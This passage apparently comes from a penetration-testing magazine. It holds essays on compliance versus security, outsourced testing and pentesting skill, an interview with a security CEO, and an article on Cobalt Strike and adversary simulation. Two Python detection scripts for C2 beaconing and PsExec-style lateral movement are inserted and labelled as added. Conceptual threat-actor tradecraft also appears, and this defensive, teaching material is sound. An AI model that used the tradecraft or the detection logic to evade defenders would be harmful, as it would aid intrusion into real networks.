such as local ISSA and OWASP chapters and frequently participates in capture
the flag events. In his free time he enjoys mountain biking.

Security vs. compliance
and the role of the penetration tester
by Joshua Gold

In regulated industries, it has become common practice for management to
assume that compliance and security are one and the same. They believe that
because an auditor has marked them as being compliant, there are no further
actions that need to be taken to secure their systems. The idea that because
something is compliant, it must also be secure has become an inside joke
among security professionals; unfortunately, those same professionals are often
incapable of translating to management exactly why a compliant system is not
necessarily secure.

INTRODUCTION
In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that
"Utilities are focusing on regulatory compliance instead of comprehensive security" and that "security
requirements are inherently incomplete, and having a culture that views the security problem as being
solved once those requirements are met will leave an organization vulnerable to cyber-attack." It is not
only utilities that suffer from this problem; in the last 18 months, over 150 million credit card numbers
and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus
(to name only a few) have learned just how far short of true security a compliant program can leave you.

THE ROLE OF THE PENETRATION TESTER
Most experienced penetration testers know the feeling of arriving on site to a new client and having the
security administrators almost beg to have their systems compromised. They are aware of how vulnerable
they are, but have been unable to secure the budget to do anything about it. They believe that the only
way to do so is for the penetration test report to show management exactly how secure their compliant
system is. Oftentimes throughout the drafting of the report, the security administrators will request
specific wording or recommendations that they believe will help them convince their management team
that something more needs to be done.

However, it is also important for the penetration tester to be aware of and knowledgeable about the
regulations with which their client must comply.

It is no secret that many companies value third party input much more highly than they do internal
recommendations. A request that has been made multiple times by a security team may suddenly be
fulfilled if it comes as a recommendation in a third party report. As such, it is often the responsibility of
the penetration tester to identify the areas where management has been lax in assigning resources and
prioritize their recommendations accordingly. If it is clear that large amounts of the security budget are
being directed towards a brand new Security Incident and Event Manager (SIEM), but the security staff
doesn't have the knowledge or training to support that SIEM, it is important for the penetration tester
to recognize this and recommend training for the security staff.

Writing a report that recommends changes that fall far outside the scope of the client's compliance
needs is as likely to create meaningful change as not writing the report at all. On the other hand, if the
report can be aligned with the client's compliance goals, it becomes far more likely that management
and the security team will utilize it to achieve not only greater security, but also stronger compliance.

IF COMPLIANCE ≠ SECURITY, WHY BOTHER?

Many people question the necessity of regulations, as they do not necessarily engender true security.
The thinking is that if companies are left to their own devices, they will develop a security posture
commensurate with their risk. To a certain extent, this line of thinking has its merits. However, one can
easily compare the security posture of the U.S. Electric Utilities (regulated by the NERC CIP Standards)
to those of the U.S. Water Utilities (unregulated). Both utilities are considered Critical Infrastructure, and
both face the same sort of cyber threats.

The NERC CIP standards have forced the electric industry to implement a minimum standard of security.
Many utilities have taken the approach of doing things right as long as they have to do them for
compliance. These utilities are using their compliance burden to drive budget into their security
departments, and to secure upper management buy-in. The water industry, on the other hand, is often
described as "The Wild West" by security experts. The lack of any regulation has led to a huge spectrum
of security postures. Some utilities are taking the threats they face seriously, and have state of the art
defenses in place. Other utilities still have SCADA systems directly connectable via dial-up without any
authentication in place. This is not from a lack of effort on the part of the security teams at these utilities;
it is often a lack of motivation, and sometimes understanding, on the part of upper management.

Compliance has given the electric utilities the motivation and justification to fight for greater budgets.
Security and compliance teams can take hard numbers to upper management to show that
an expenditure of $100,000 can prevent a fine of $1,000,000. Security teams in the water industry that
want to spend the same amount are often left with no compelling way to justify the expenditure in terms
that management is likely to understand.

WHAT CAN BE DONE TO INCREASE SECURITY AND COMPLIANCE?
It is clear that compliance does have an impact on the overall level of security that can be expected in an
industry. However, it is also clear that as the compliance burden grows, companies begin to shift their
focus towards meeting compliance, rather than becoming truly secure. As an independent third party, it
is important for the penetration tester to maintain an objective view of the overall security posture and
the machinations that have brought it about. In the end, it is the goal of every penetration test to help the
client become more secure. Often this is accomplished by demonstrating weaknesses in target systems
and advising on mitigating the risk to those systems. In a regulated industry, those mitigation plans may
need to align with the overall compliance goal while still reducing the overall vulnerability of the system.
Through this alignment, the penetration tester provides the means for security teams to fight for and
receive the funding and support that makes true security possible.

Perhaps the best way for penetration testers to accomplish this is to become an expert on the
compliance burden faced by their clients. Penetration tests for the electric industry should be conducted
by NERC CIP experts, penetration testers for the health industry should be HIPAA experts, and
penetration testers for the retail industry should be PCI-DSS experts. A good NERC CIP pentester could
certainly find plenty of vulnerabilities in a hospital's systems, but their report would not be nearly
as complete or compelling as one written by a HIPAA expert, to say nothing of a penetration tester who
has no compliance knowledge at all. The ability to custom tailor report findings towards specific
compliance burdens will allow penetration testers to better serve their clients and help increase the
overall level of security from compliance-driven entities.

About the author:

JOSHUA GOLD
Security Consultant with Network & Security Technologies, which provides
consulting services primarily to the U.S. Electric Industry. Mr. Gold was
awarded a B.S. degree in Cybersecurity from the University of Maryland
system and maintains a number of industry certifications. He also volunteers
his time with the National Emergency Management Teams (Region 2,
Communications Division) where he actively assisted in the recovery
of businesses in New York City after Hurricane Sandy in 2012.

What issues might occur
in outsourcing to an SI
by Jim Hart


Many large organizations use a system integrator (SI) to provide their IT
infrastructure and associated services. There is also a growing trend to use
multiple suppliers to deliver the holistic service that was once provided by a
single SI. In either case, using SI(s) can significantly impact the efficacy of
Penetration Testing unless the issues are recognized and managed early on by
the organization being tested.

Penetration testing is typically performed for a set number of reasons, often at pre-determined intervals
and for pre-determined in-scope systems. Other testing may occur ad-hoc as required after significant
changes to the environment.

Pre-determined testing is again sub-divided into evaluating security weaknesses with the intention
of maintaining a good level of protection, or as part of a regulatory requirement for annual testing such
as PCI. How effective the penetration testing is may be highly dependent on the type of engagement the
organization has with the SI and not necessarily the SI itself.

A good example here is based on our experiences of IBM, Fujitsu, CGI and others. The SIs themselves
all have the skills and capability to offer a highly effective all-round service delivering on the promises set
out when a contract is negotiated. However, depending on the contract negotiated, the organization will
receive different levels of service highly correlated to the value of the overall contract with the
SI (basically, you get what you pay for). So, while at a high level and on paper the services provided in the
bundle by the SI, like Penetration Testing, may look comprehensive and tick all the right boxes, do they
really deliver what the organization needs?

In our example above, the SI may deliver the regular penetration tests on time and per the pre-defined
scope, generally satisfying the terms of the contract but not necessarily satisfying the need to effectively
secure the organization and to assure full compliance against any regulatory requirements. Gaps only
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed.

It is important to regularly ask questions of the SI such as how deep was the testing and how was the
scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning, hardly real
penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not
engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the
more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as penetration testing is completed
regularly.

Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating
the service costs, so it is in their interests to manage that list well. What the asset list does not do,
however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective as long as the organization has kept the SI informed of which applications or data sets
may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those
organizations where a PCI scope may bleed into other networks due to applications being connected to
the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things
may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the
annual testing.

The SI may continue to deliver per the contract and report all is well, and the organization may assume
all of PCI is being regularly tested as the loss of synchronization of asset details goes unnoticed.

It is not until there is a breach, or possibly worse still, the PCI auditor questions why some systems
were missed out, that the organization becomes aware of this situation. The same scenario applies to
critical systems which contain confidential data, etc. The organization must ensure the scope the SI is
working to is kept up to date so the right systems get tested, and it is not generally the responsibility of
the SI to pro-actively obtain this information.

Regulatory requirements are also evolving and generally this tends towards stricter security controls
which can result in additional complexity. Introducing a requirement to perform authenticated testing, for
example in PCI v3, creates a need to perform Penetration Testing in a very different way on some
systems. For applications that require authentication, it can be very difficult to obtain credentials for the
SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements
around who can get access or how the access must be provided. If this is a new requirement that
the organization has never previously had to deal with, especially outside of its pre-production testing
networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this
will take time. The contract between the organization and the SI may simply not accommodate this at all,
but the time to find this out is not a few weeks before the regulatory audit is due!

When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and
the service is not generally questioned. Service reporting is often all green, indicating all deliverables are
on track; after all, that's what you pay an SI for: to deliver the contracted service on time. You don't
generally get an independent attestation as to quality, or careful validation that it is meeting the real
security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is
incredibly important for the organization to either employ people with the necessary skills to validate the
quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration
Testing organization who can provide a baseline to identify service gaps.

If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize
the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially
PCI, may mean it's time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track.

About the author:

JIM HART
A seasoned Security Professional who has developed and honed his skills
over the past 15 years in security. A consummate specialist who has
successfully transformed from a highly skilled technical engineer, to Manager
of a team of security analysts (UK and matrix-managed those in India),
through consulting and then transitioning into a business development role
delivering thought-leadership for major clients' information security
requirements within an Enterprise sales team of a Fortune 500 security
software and service provider.

Pentesting: a true art form
by Martin Brough

Pentesting is truly an art form that I have studied for most of my life, however,
pentesting is a dying art form that needs to be resuscitated! I don't mean that
people are no longer using them; in fact, it's just the opposite.

I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice.
Within the past two years, I have noticed a significant increase in companies adding annual pentests
into their contracts with companies that handle their data. Companies that offer services such as SaaS,
cloud data storage, outsourced web development and media management are now all being required
by contract to participate in both annual audits of their systems and penetration tests to ensure their
data is secure. So what do I mean by "pentesting is a dying art form"? I mean that pentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know
what they are looking for and how to test your company's systems. It seems that every script-kiddie
with a Kali box these days will tell you they are a pentester!

A true pentest cannot be done from a box of automated tools. It involves a ton of research, analytics,
scanning, probing, watching, social engineering, oh and yeah, exploitation! When I was growing up, if
you wanted to learn to be a pentester or how to find vulnerabilities in software or hardware, you needed
to be a member of small groups that did that as a hobby. Penetration testing used to be viewed as
hacking and hackers have always been close-knit groups that don't share a lot unless you are vetted.
Online video resources, like YouTube, I feel have changed that a lot. If you want to know what command
to run in Nikto or Nmap, then just Google it and find a tutorial that some other teenager posted after
watching another teenager do it. I am excited to see the direction that pentesting is taking as far as
being accepted on a corporate level because it says to me that people are starting to care about their
data and what it's doing.

I think it's really important to convey a few key points about penetration tests:

1. A pentest does not make your company un-hackable. The main objective of a well-done pentest is to
reduce your attack surface. Your goal as a company should be to allow the specialized team conducting
the pentest to treat your network as though they were a real attacker trying to get in. You want to find as
many holes in your network as you can and close them.

2. Put as few restrictions on the pentesters as possible. A recent trend I have noticed in the past year has
been companies that are contractually obligated to have these tests done but see them as a burden and
dramatically limit the network exposure that the teams are allowed to have. This makes the results of your
pentest borderline useless. One example I have seen of this is being told I can give them a report of my
web application scans but under no circumstances am I to exploit any vulnerability found. Exploitation
not only helps to find the directions of traversal after gaining access but also tests any scanners, firewalls
and loggers that are in place to see if they are configured to pick up on these kinds of events, so it is very
important to allow the pentesters to run a full pentest against your defenses.

3. After all is said and done, your pentest is complete, your attack surface reduced and you have your
certificate in hand, spend the next 364 days maintaining the hard work you just put in. Patch your
systems, check your logs, and always verify your code.

So what does all this mean for the future of pentesting? I believe that we will continue to see a massive
increase in the requirement to have not only annual but semiannual pentests conducted for high profile
companies especially. I strongly feel that C-Level personnel in these enterprises are starting to see not
just the compliance value but also the security value of having proper pentests conducted. Executives
are able to see firsthand more and more in the news just how important it is to maintain a secure
environment for your company's data. Of course, with the increase in demand for pentesting, there
in turn is an increase in those offering pentest services. Make sure you do your homework on who you
sign to conduct your pentest. That person, whom you give access to your network, can do a lot
of damage if they are guessing their way through! If you see your pentester sitting in your office
watching a YouTube video on how to use msfconsole, you need to dismiss them as soon as you can.
There are plenty of reputable companies out there, you just need to find one that meets your
company's needs as well as fits your company's financial situation.

About the author:

MARTIN BROUGH
Solutions-oriented IT Specialist with notable success directing a broad range
of corporate IT initiatives while participating in planning and implementation
of information-systems solutions in direct support of business objectives.

Think of security as a wheel and a never ending circle
interview with Martin Voelk, CEO of Cyber 51

MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin
was already regularly teaching Penetration Testing Training
Courses, Cisco authorized Security Courses and was regularly
engaged by governments and other businesses to establish
Security policies, perform Ethical Hacking and Penetration Tests
in order to secure network infrastructures and to remediate the
threats encountered.

[PenTest Magazine]: Can you tell us something about yourself?

[Martin Voelk]: My name is Martin Voelk, I am 41 years old and have been in the IT Industry since 1997.
I started out as a systems admin, and moved into networking where I achieved numerous certifications up
to Cisco CCIE. As of 2005, I gained more interest in IT Security and started with penetration testing services
as a contractor. Despite being more on the commercial side of things now, I hold a lot of current pentesting
certifications such as the CEH, OSWP and OSCP as I am fascinated by auditing networks and
infrastructures.

[PM]: What convinced you to establish your own company?

[MV]: Numerous factors played a role. I am an entrepreneur by heart and wanted to create my own
company being able to focus on penetration testing. Financial reward was also one of the drivers and so
was independency.

[PM]: Your firm provides services for companies from different sectors like card industry, healthcare,
manufacturing or educational. Do you find more sectors become aware of cyber attacks?

[MV]: Security awareness has certainly reached board level. Many clients we have still don't believe they
could be targeted, but use our services regardless because they are bound to government and industry
regulations such as PCI, HIPAA, ISO 27001 etc.

[PM]: What is the major difficulty in working with such different companies and sectors?

[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with the customer.
On some occasions, especially in larger companies, internal engineers become very defensive when being
confronted with results. However, it's not our aim to finger point. We merely uncover holes and help
customers become more secure. On other occasions, the more we find, the more it is appreciated.
Another big challenge is governmental work as it often requires very specific skills and certifications but the
consultant holds the wrong passport. This can be very frustrating at times as, for example, only a UK citizen is
allowed to perform the work for a UK government client.

[PM]: From your own experience, do you prefer to work with smaller or bigger companies?

[MV]: We prefer mid size to large size.

[PM]: I can see your company provides great initiative: free educational sessions for children. Can you
tell us more about this idea?

[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico
where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads,
social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable for
kids.

[PM]: What are your general thoughts about development of cyber security market?

[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social
Engineering), Web Applications, Mobile Apps and Wireless.

[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be any
breakthrough changes in technology?

[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications will
become more sophisticated and need more testing and the mobile market brings its own new challenges in
Wireless and Apps.

[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security specialists?
Do you find it's going to be harder to find a job in this area?

[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile,
Colombia and Panama). We also engage in the UK market but very little in other countries. For us the
biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and
employers in the US actually often struggle to find the right skills available.

The top 3 criteria:

- OSCP certified or better (OSCE etc.). The Offensive Security Certifications are the best ones in the market
and we hire OSCPs over CEH, because the OSCP is a hands on and very challenging exam. Someone
who passed that exam is a real pentester who also can do reporting.

- Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the
guys outside the US don't come with great English language skills.

- Integrity, working to timelines and reliability.

[PM]: Everyday we can hear about new attacks. How do you see cyber threats evolving in the near
future?

[MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime
and away from individual guys. Some of the attacks we have seen at customers require teams of highly
skilled experts and tools and a lot of the underworld has created and is creating task forces for certain jobs.
A lot more challenging to tackle than the lone hacker or script kiddie.

[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in
2016?

[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin
American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting. Also
a lot of companies start realizing that technical defense isn't everything and that social engineering makes
up a lot of the breaches. User education and enforcement of policies will become a much bigger part.

[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any good
advice?

[MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web App) is
not good enough anymore these days. Pentesting should include mobile App, Wireless, Bluetooth and
Social Engineering. For aspiring pentesters and existing pentesters, do the Offensive Security Certified
Professional (OSCP) certification. It's very well recognized in the industry and weeds out the theory from the
hands on folks.

The sword and the shield
by Tom Updegrove

I started to write this article about one of my favorite security tools, Cobalt Strike, but as I delved into
the history and thinking behind Cobalt Strike I realized that a better story lies beneath the surface. The
real story is about Pentesting and Adversarial Role Playing, which is thought to be the next stage of
Digital Security. There's a whole new breed of White Hat Hackers and they are called Threat Actors.

THE FUTURE OF DIGITAL DEFENSE
Penetration Testers tend to focus on gaining access and scream eureka when they get a shell. On the
other hand, Threat Actors focus on post-exploitation, lateral movement, and persistence. Most
Penetration Testers that I know say the test is over once they gain access to a system; whether that
was by gaining access to a server room and dropping a zombie pineapple into the mix, or brute forcing
a password and escalating privileges. On the other hand, Adversarial Role Playing involves a much
longer engagement, and the behavior is more similar to a real Advanced Persistent Threat or APT. The
focus is on how well the Network Defender can detect, mitigate and subdue the invader. According
to Raphael Mudge (the developer of Armitage and Cobalt Strike), this is the future direction of Digital
Defense.

ARMITAGE
On the Armitage home page it says "Cyber Attack Management for Metasploit", but Armitage is more
than that. Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets,
recommends exploits, and exposes the advanced post-exploitation features in the framework.

My first introduction to Metasploit was via the CLI, which was important for understanding the framework.
How well one understands the exploits, payloads, Meterpreter, auxiliary modules and scripts determines
how effective the attack is. Seeing the same commands and getting visual feedback is so much more
helpful: it is like the difference between listening to a TV show on the radio and seeing it on a 4K flat
screen in surround sound. Well, maybe not that extreme, but you get the idea.

COBALT STRIKE
Cobalt Strike is like a grown-up version of Armitage. According to its website, Cobalt Strike is for
Adversary Simulation and Red Team Operations. Versions 1.0 and 2.0 were built on the Metasploit
Framework and were among the first usable GUI front-ends for it. An important component of Cobalt
Strike is Beacon. In the words of the Cobalt Strike website: "Beacon is Cobalt Strike's payload to model
advanced attackers. Use Beacon to egress a network over HTTP, HTTPS, or DNS. You may also limit
which hosts egress a network by controlling peer-to-peer Beacons over Windows named pipes." Cobalt
Strike also adds social engineering features that let the Actor get a foothold, covert command and
control with Beacon, browser pivoting, and reporting to Armitage's existing exploitation and team
collaboration capabilities. Using Beacon you can tunnel Meterpreter sessions and use all of Metasploit's
exploit and post-exploitation capabilities. Beacon can also run scripts over its connection, PowerShell,
Python or Java for example. There is even an email phishing module that reports when recipients open
the phishing email you sent them.
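The defender's side of the Beacon description above is worth making concrete. A Beacon that egresses over HTTP or HTTPS calls home on a sleep timer, so from the proxy's point of view it looks like one client fetching the same host at clockwork intervals, unlike a person browsing. The script below is an added example written for this article's argument, not Cobalt Strike's code and not from the original text. It assumes a constructed, simplified proxy log line format (timestamp, client IP, method, host, path, status) and scores every client/host pair by how regular its request timing is; the sample log, the hostnames and the function names are all made up for the illustration.

```python
"""Periodic-callback ("beaconing") detector for outbound web-proxy logs.
Added example; not Cobalt Strike's code and not from the article. Assumes a
constructed, simplified proxy line format:
    <ISO-8601 timestamp> <client_ip> <method> <host> <path> <status>
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log (hostnames are invented). One host is polled about
# every 60 s with a few seconds of jitter (beacon-like); the other is browsed
# at human, irregular intervals.
SAMPLE_LOG = """\
2015-10-05T09:00:00 10.0.0.7 GET cdn.example-update.test /pixel.gif 200
2015-10-05T09:00:10 10.0.0.7 GET news.example.test /index.html 200
2015-10-05T09:01:03 10.0.0.7 GET cdn.example-update.test /pixel.gif 200
2015-10-05T09:01:55 10.0.0.7 GET news.example.test /sports 200
2015-10-05T09:02:01 10.0.0.7 GET cdn.example-update.test /pixel.gif 200
2015-10-05T09:03:04 10.0.0.7 GET cdn.example-update.test /pixel.gif 200
2015-10-05T09:04:00 10.0.0.7 GET cdn.example-update.test /pixel.gif 200
2015-10-05T09:05:02 10.0.0.7 GET cdn.example-update.test /pixel.gif 200
2015-10-05T09:07:40 10.0.0.7 GET news.example.test /weather 200
2015-10-05T09:20:15 10.0.0.7 GET news.example.test /index.html 200
2015-10-05T09:21:00 10.0.0.7 GET news.example.test /sports 200
"""


def parse(log_text):
    """Yield (timestamp, client_ip, host) for each well-formed line; skip junk lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        try:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[3]
        except ValueError:
            continue


def find_beacons(log_text, min_requests=5, max_cv=0.2):
    """Score every (client, host) pair by the regularity of its request timing.

    cv = stdev / mean of the inter-request gaps: close to 0 for a clockwork
    callback, close to or above 1 for human browsing. A pair is marked
    'suspicious' when it has at least min_requests requests and cv <= max_cv.
    """
    times = defaultdict(list)
    for ts, client, host in parse(log_text):
        times[(client, host)].append(ts)

    results = []
    for (client, host), stamps in times.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        results.append({"client": client, "host": host, "requests": len(stamps),
                        "mean_interval_s": round(avg, 1), "cv": round(cv, 3),
                        "suspicious": cv <= max_cv})
    # most regular (most beacon-like) pairs first
    return sorted(results, key=lambda r: r["cv"])


if __name__ == "__main__":
    for r in find_beacons(SAMPLE_LOG):
        flag = "BEACON?" if r["suspicious"] else "ok"
        print(f"{flag:8} {r['client']} -> {r['host']} n={r['requests']} "
              f"mean={r['mean_interval_s']}s cv={r['cv']}")
```

On the sample data the polled host scores a coefficient of variation under 0.05 while the browsed host scores close to 0.9. Real Beacons can be configured with a jitter percentage precisely to blunt this kind of check, so `max_cv` is a knob to tune against your own traffic rather than a fixed rule, and a DNS Beacon needs the same analysis run over resolver logs instead of the proxy.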

COBALT STRIKE 3.0

As of October 2015, Cobalt Strike 3.0 shares no code with Armitage and does not depend on the
Metasploit Framework; it is the first version of Cobalt Strike not to. The tool is geared towards red
team operations and adversary simulation services. Although it no longer depends on the Metasploit
Framework, you can still drive Metasploit elements from it.

In the shared-Metasploit model (the one Armitage's team server uses), your team works through one
Metasploit instance and will:

- Use the same sessions
- Share hosts, captured data, and downloaded files
- Communicate through a shared event log
- Run bots to automate red team tasks

Cobalt Strike 3.0 has been available from the website since October 2015, and a trial version can be
downloaded at https://www.cobaltstrike.com/trial . Its sibling, Armitage, is free of charge at
http://www.fastandeasyhacking.com/download

RED TEAMS
According to Wikipedia, "A red team is an independent group that challenges an organization to improve
its effectiveness. The United States intelligence community (military and civilian) has red teams that
explore alternative futures and write articles as if they were foreign world leaders. Little formal doctrine
or publications about Red Teaming in the military exist." [1]

[1] LtCol Brendan S. Mulvaney, "Strengthened Through the Challenge" (PDF), Marine Corps Gazette, July 2012.

PENETRATION TESTERS AND RED TEAMS
Penetration testers assess an organization's security, often unbeknownst to the client's staff (only
management is aware of the assessment). This type of Red Team engagement gives a more realistic
picture of security readiness than exercises, role playing, or announced assessments, and the Red Team
may trigger active controls and countermeasures within the operational environment.

Red Team Operations:

- Full Scope Penetration Tests
- Long-term Operations
- War Games
- Threat Scenarios / Cyber Security Exercises / Attack Simulations

THREAT ACTORS
Once a threat actor gains access to the network, they maintain communication with the compromised
computer system. They gain more privileges by harvesting login credentials from the network that have
access to valuable information, and they gather information (e.g. documents found on desktops, network
access to shared drives, etc.) through regular user accounts. Once identified, the data is staged for
exfiltration.

GAINING PERSISTENCE ACROSS THE NETWORK

Lateral movement usually involves reconnaissance, credential theft, and infiltrating other computers.

Once communication between the compromised systems and the C&C (command and control) servers
has been established, threat actors sustain persistent access across the network. They move laterally
within the network and gain higher privileges through the use of different tools. This in turn gives threat
actors access to the servers that hold the valuable information, the company's crown jewels.

Apart from servers, threat actors are also interested in endpoint systems, since confidential documents
such as Microsoft Word, Excel and PowerPoint files are stored on personal computers.

As threat actors move deeper into the network, their movements and methods become difficult to
detect, especially when they use the Windows features and tools that IT administrators use every day.
Gaining administrative privileges also lets the threat actors' activity go undetected or even untraced.
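The point that lateral movement hides behind ordinary administrative tooling is also where it can be caught: an admin tool still leaves the same Windows events an attacker's use of it does, and the difference is in the pattern, one account reaching many hosts in minutes, or a service appearing on a host seconds after a network logon to it (the footprint of PsExec-style execution, which installs a service named PSEXESVC). The triage below is an added example for this article, not from the original text or any vendor tool. It assumes a constructed, simplified event record with only the fields the two rules need; in a real deployment these come from Event ID 4624 (logon) in the Security log and 7045 (service installed) in the System log. The hostnames, accounts and timings are invented.

```python
"""Lateral-movement triage over Windows logon and service-install events.
Added example; not from the article or any vendor product. Event records are
constructed and simplified: dicts with the few fields the rules need. In
production they would come from Security 4624 and System 7045 events.
"""
from collections import defaultdict
from datetime import datetime, timedelta

NETWORK_LOGON_TYPES = {3, 10}   # 3 = network (SMB/WMI), 10 = RemoteInteractive (RDP)


def ev(ts, event_id, host, account=None, src_ip=None, logon_type=None, service=None):
    """Build one constructed event record."""
    return {"time": datetime.fromisoformat(ts), "event_id": event_id, "host": host,
            "account": account, "src_ip": src_ip, "logon_type": logon_type,
            "service": service}


SAMPLE_EVENTS = [
    # One service account fanning out over SMB/RDP and installing PSEXESVC: PsExec-style movement.
    ev("2015-10-05T10:00:00", 4624, "HOST-A", "svc_backup", "10.0.0.7", 3),
    ev("2015-10-05T10:00:05", 7045, "HOST-A", service="PSEXESVC"),
    ev("2015-10-05T10:01:00", 4624, "HOST-B", "svc_backup", "10.0.0.7", 3),
    ev("2015-10-05T10:01:04", 7045, "HOST-B", service="PSEXESVC"),
    ev("2015-10-05T10:02:00", 4624, "HOST-C", "svc_backup", "10.0.0.7", 3),
    ev("2015-10-05T10:03:00", 4624, "HOST-D", "svc_backup", "10.0.0.7", 10),
    # An ordinary user hitting one file server twice: no finding.
    ev("2015-10-05T10:05:00", 4624, "FILESRV", "jdoe", "10.0.0.21", 3),
    ev("2015-10-05T10:30:00", 4624, "FILESRV", "jdoe", "10.0.0.21", 3),
    # A console logon (type 2) is not remote access and is ignored by rule 1.
    ev("2015-10-05T10:40:00", 4624, "HOST-E", "admin", "127.0.0.1", 2),
    # A service install with no preceding network logon: no finding from rule 2.
    ev("2015-10-05T11:00:00", 7045, "HOST-E", service="WinDefend"),
]


def fan_out(events, window=timedelta(minutes=10), min_hosts=3):
    """Rule 1: one account reaching >= min_hosts distinct hosts over the network within `window`."""
    logons = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if e["event_id"] == 4624 and e["logon_type"] in NETWORK_LOGON_TYPES:
            logons[e["account"]].append(e)
    findings = []
    for account, seq in logons.items():
        for i, first in enumerate(seq):
            hosts = {x["host"] for x in seq[i:] if x["time"] - first["time"] <= window}
            if len(hosts) >= min_hosts:
                findings.append({"rule": "fan_out", "account": account,
                                 "hosts": sorted(hosts), "start": first["time"]})
                break   # one finding per account is enough for triage
    return findings


def service_after_network_logon(events, max_gap=timedelta(seconds=60)):
    """Rule 2: a new service (7045) on a host within max_gap after a network logon to that host."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_host[e["host"]].append(e)
    findings = []
    for host, seq in by_host.items():
        for j, svc in enumerate(seq):
            if svc["event_id"] != 7045:
                continue
            for logon in reversed(seq[:j]):          # nearest earlier event first
                if (logon["event_id"] == 4624 and logon["logon_type"] in NETWORK_LOGON_TYPES
                        and svc["time"] - logon["time"] <= max_gap):
                    findings.append({"rule": "service_after_logon", "host": host,
                                     "account": logon["account"], "service": svc["service"],
                                     "src_ip": logon["src_ip"]})
                    break
    return findings


def triage(events):
    """Run both rules and return the combined findings."""
    return fan_out(events) + service_after_network_logon(events)


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Neither rule looks at the tool name, which is the point: renaming PSEXESVC or using WMI instead of a service changes the second rule's hit but not the first, and a real administrator who does touch four hosts in ten minutes is exactly the kind of false positive the Adversary Simulation is meant to teach the SOC to triage quickly.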

REMEDIATION
In the past few years a number of good industry reports and statistics on data breaches and
investigations have been published. Most of them focus on investigative findings and detection trends.
Less attention has been paid to what is arguably the most transformative component of an adversarial
engagement: successful remediation, and the maturation of an organization's ability to detect and
respond to attacks going forward. How do attackers respond to remediation actions, and what
distinguishes successful organizations from the less successful ones?

A few points to consider:

- The average time before attackers attempt reinfection after an organization completes its initial
remediation
- The percentage of organizations impacted by more than one attack group at a time
- The percentage of organizations that detect attacks internally versus those notified by third parties
- The factors that make investigation and remediation effective and efficient
- Why some organizations remediate successfully and efficiently, and why others struggle

THE TOOLS
The tool needs for Adversary Simulations are far different. A unique covert channel matters far more
than an unpatched exploit. A common element of Adversary Simulations is a white-box, assumed-breach
model: as often as not, an Adversary Simulation starts from an assumed full domain compromise. The
operator's goal is to use that access to achieve effects and steal data in ways that exercise and prepare
the security operations staff for what they are really up against. Remember, too, that the threat actor in
a production environment may be an employee of the company, acting from inside the corporate network.

ADVERSARY SIMULATION TRAINING

The tools for Adversary Simulation are coming. The tools alone are not the full package, however:
Adversary Simulations require more than good tools, they require good technicians.

TRADECRAFT
Raphael Mudge uses the term Tradecraft to describe the mindset for Adversary Simulations. He says
they require an appreciation for efficacy that simply isn't there in the penetration testing community
yet. Tradecraft is the set of best practices of a modern adversary. What is the adversary's playbook?
What checklists do they follow? Why do they do the things they do? These are the questions
a corporation's security defenders need to ask.

THE BEST DEFENSE IS A GOOD OFFENSE

Both Armitage and Cobalt Strike pack enough offensive capability to take down a network abruptly or to
act as a long-term data exfiltrator. Penetration Testers will get the most benefit from the current version
of Armitage because of its use of the Metasploit Framework and its ready-made exploits. Threat Actors
